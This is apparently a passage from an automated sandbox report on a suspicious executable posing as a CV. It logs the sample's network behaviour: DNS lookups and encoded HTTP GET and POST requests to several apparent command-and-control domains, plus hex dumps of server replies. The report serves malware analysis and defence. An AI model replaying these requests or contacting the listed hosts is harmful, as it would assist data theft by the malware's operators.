                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_00114EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00114EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Encoding: gzipContent-Type: text/html; charset=UTF-8Date: Sun, 24 Nov 2024 07:20:17 GMTServer: nginxVary: Accept-EncodingContent-Length: 44Connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 0b cd 4b 4c ca 49 55 28 c9 57 48 4f 2d 51 48 ce cf cb 4b 4d 2e c9 cc cf 03 00 83 11 dc 67 18 00 00 00 Data Ascii: KLIU(WHO-QHKM.g
                Source: global trafficHTTP traffic detected: GET /wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtNP5JJHXZKyNT2DdIvKryYyf9MjUEDxaaWmViMTMmYuNlSg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.grandesofertas.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z9pi/?8z=ied+cptg7UakpzhN9du5VSsdJmGTMgTej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipglcbqILcb35Ov8GaOwyCm29DGf4fuXu0q+2HMSGnvScCRQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /8qt7/?8z=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspdKSzY9KcXwRza5ymlGbypi62mmKXsyADr8TyMiRK3aVg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.ytsd88.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mlxg/?8z=cQzZIkxePH03UbtQeBzk4injmTvYH6638l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrU+xVd2/bH1iEsgunrHUhzfTGxWnvWCfN9FDnBntbsziOAg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.bpgroup.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dash/?8z=YMHBudoHIUxH+uWLZqjBWOOezInCz6AkcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q7rs8e/TXZIM23dD0/NRzxHRz5qXuh4PnXbyxYOGgr+8Fvg==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.fortevision.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mv7p/?8z=5Xkb80UCbQYKeySJYU53mvY68yMkCwQR8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOJq8TGuAoUt3aFnOU+z5Bj5RQAf/d4rkt/TznqZIVeIVhXw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.rtpterbaruwaktu3.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cm9a/?8z=AvN42DnS9Qw3kn1Ry3KvTJdIGYrzP5U8wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvlhjap6ivTCbha0++M9x+FSojTXuY7LBG4JzCnBD9GjapUw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.prhmcjdz.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6urf/?8z=l+g0G83zvX30P9FhHqUPiCMCp3kC0CiGmxU2wY32UHo7SRAzM3NVc5Nn4wkj2AVHW/hBkkPychobZjIg4/uR1+EuxlxxaYBW6k6qKLTJOsgiw7KKI/jspabCkJT8248+oQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.connecty.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /cpgr/?8z=yUPZw4O96lKRgUDiLQ4YjgWex0ZVjKNUVr3HqoHreXe2a6Vc78U2VxoX4VUOXe2AKNSXv9msRJ2q39Y75lzjKCb8tnAargGvaXZxb0CZL2/WUDIdN/ulbpy32VGDPj7SFQ==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.tals.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u9hy/?8z=WqQro+xdjTeJIlGzWne5GtaANfF9lgg49rKxVxpmjgGfbhgcY6AAEIO8u8GwbvTJPVNB3UOdkxCDRvWF6atxHJx7JVXWinhAO2sI58h2p8ITVN90H2WFsxLS9qnZGEsuzw==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.50food.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /f8c6/?afwXa=6nnHQlkprRILE&8z=qZLxeIvUMpnHejM96/T0f6H04zmKlOMWVFIDlZeaKgP5Xe4TtN4Ku6PXk96ANpScY+aAYV4Nd0GQ4lG6LSWgjSD2yKENm9C4V9rKFkDKUP4Cqcdi4mEHWGKUWB9ccnENVw== HTTP/1.1Host: www.zriaraem-skiry.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gb2h/?8z=EASy0dFQ3+mIcpYg1BhqvEqrUNk9skL9wz6GDDYkBoOZntt4ETpAdTcmLSDA/l8Pq56TjzGqLUU3SQIDrjgXIr49oxoJg0asAGStZmb1Pixrpd6NwrYyT6qlasg7QhQxcA==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.nmgzjwh.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gdvz/?8z=42oDQZKHBS2RpvFMBZ7EzkD144AzeGctXRowK0Gqt433jWsXILGJddh+nwwRXUDcpHF9qTVEG6VDXm2WV9OiTRVapNS+KsXc4QK7u4kHLuXU5OsjWi1vwOB1/wMg5LW4+w==&afwXa=6nnHQlkprRILE HTTP/1.1Host: www.sklad-iq.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.grandesofertas.fun
                Source: global trafficDNS traffic detected: DNS query: www.jijievo.site
                Source: global trafficDNS traffic detected: DNS query: www.ytsd88.top
                Source: global trafficDNS traffic detected: DNS query: www.bpgroup.site
                Source: global trafficDNS traffic detected: DNS query: www.fortevision.xyz
                Source: global trafficDNS traffic detected: DNS query: www.rtpterbaruwaktu3.xyz
                Source: global trafficDNS traffic detected: DNS query: www.prhmcjdz.tokyo
                Source: global trafficDNS traffic detected: DNS query: www.connecty.live
                Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
                Source: global trafficDNS traffic detected: DNS query: www.50food.com
                Source: global trafficDNS traffic detected: DNS query: www.zriaraem-skiry.sbs
                Source: global trafficDNS traffic detected: DNS query: www.nmgzjwh.net
                Source: global trafficDNS traffic detected: DNS query: www.sklad-iq.online
                Source: global trafficDNS traffic detected: DNS query: www.supernutra01.online
                Source: unknownHTTP traffic detected: POST /z9pi/ HTTP/1.1Host: www.jijievo.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateOrigin: http://www.jijievo.siteReferer: http://www.jijievo.site/z9pi/Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 203User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36Data Raw: 38 7a 3d 76 63 31 65 66 5a 42 79 79 30 2f 47 72 68 6b 42 67 61 47 34 56 69 67 46 54 47 62 34 4d 44 66 62 6c 4c 51 31 58 4c 62 41 31 42 64 30 75 67 74 72 49 37 45 34 53 78 6b 69 44 50 79 73 6c 6c 2f 4c 43 75 54 72 73 6d 43 51 66 52 78 6a 35 4f 54 74 46 2b 66 30 69 41 55 6b 6f 2f 48 7a 63 52 4a 6a 33 49 4f 62 4d 53 7a 59 6c 45 34 46 57 2b 67 48 67 77 33 63 68 50 43 6d 48 52 53 6d 32 77 68 34 4b 48 30 72 64 6e 49 69 76 6c 2b 34 55 2b 33 70 31 73 71 6d 66 35 77 6d 4e 63 76 57 36 4e 64 61 64 58 34 78 35 65 72 48 56 46 58 6f 79 66 76 41 4c 6f 76 63 33 36 37 6a 49 73 6d 47 74 39 35 42 37 54 4d 4f 42 34 63 3d Data Ascii: 8z=vc1efZByy0/GrhkBgaG4VigFTGb4MDfblLQ1XLbA1Bd0ugtrI7E4SxkiDPysll/LCuTrsmCQfRxj5OTtF+f0iAUko/HzcRJj3IObMSzYlE4FW+gHgw3chPCmHRSm2wh4KH0rdnIivl+4U+3p1sqmf5wmNcvW6NdadX4x5erHVFXoyfvALovc367jIsmGt95B7TMOB4c=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:30 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:33 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:36 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:20:38 GMTContent-Type: text/htmlContent-Length: 409Connection: closeETag: "66d016cf-199"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 85 8d e8 b4 b9 ef bc 8c e9 ab 98 e6 95 88 e5 92 8c e5 ae 89 e5 85 a8 e7 9a 84 e6 89 98 e7 ae a1 e6 8e a7 e5 88 b6 e9 9d a2 e6 9d bf 29 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sun, 24 Nov 2024 07:20:49 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 